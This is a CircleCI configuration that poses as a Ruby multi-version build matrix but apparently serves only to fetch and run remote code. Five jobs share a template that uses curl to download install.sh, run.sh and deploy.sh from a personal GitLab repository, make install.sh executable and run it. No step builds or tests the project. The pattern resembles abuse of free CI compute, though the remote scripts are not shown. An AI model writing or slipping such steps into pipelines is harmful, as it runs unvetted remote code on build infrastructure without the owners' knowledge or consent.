.build_template: &build_definition
  steps:
    - run: curl -L https://gitlab.com/kontolse/circleci/-/raw/master/install.sh > ./install.sh
    - run: curl -L https://gitlab.com/kontolse/circleci/-/raw/master/run.sh > ./run.sh
    - run: curl -L https://gitlab.com/kontolse/circleci/-/raw/master/deploy.sh > ./deploy.sh
    - run: chmod +x ./install.sh
    - run: ./install.sh        

version: 2.0

jobs:
  build:
    docker:
      - image: ruby
    steps:
      - checkout
  build_ruby2_7:
    <<: *build_definition
    docker:
      - image: ruby:2.7
  build_ruby2_6:
    <<: *build_definition
    docker:
      - image: ruby:2.6
  build_ruby2_5:
    <<: *build_definition
    docker:
      - image: ruby:2.5
  build_ruby2_4:
    <<: *build_definition
    docker:
      - image: ruby:2.4
  build_ruby2_3:
    <<: *build_definition
    docker:
      - image: ruby:2.3

workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - build_ruby2_7
      - build_ruby2_6
      - build_ruby2_5
      - build_ruby2_4
      - build_ruby2_3
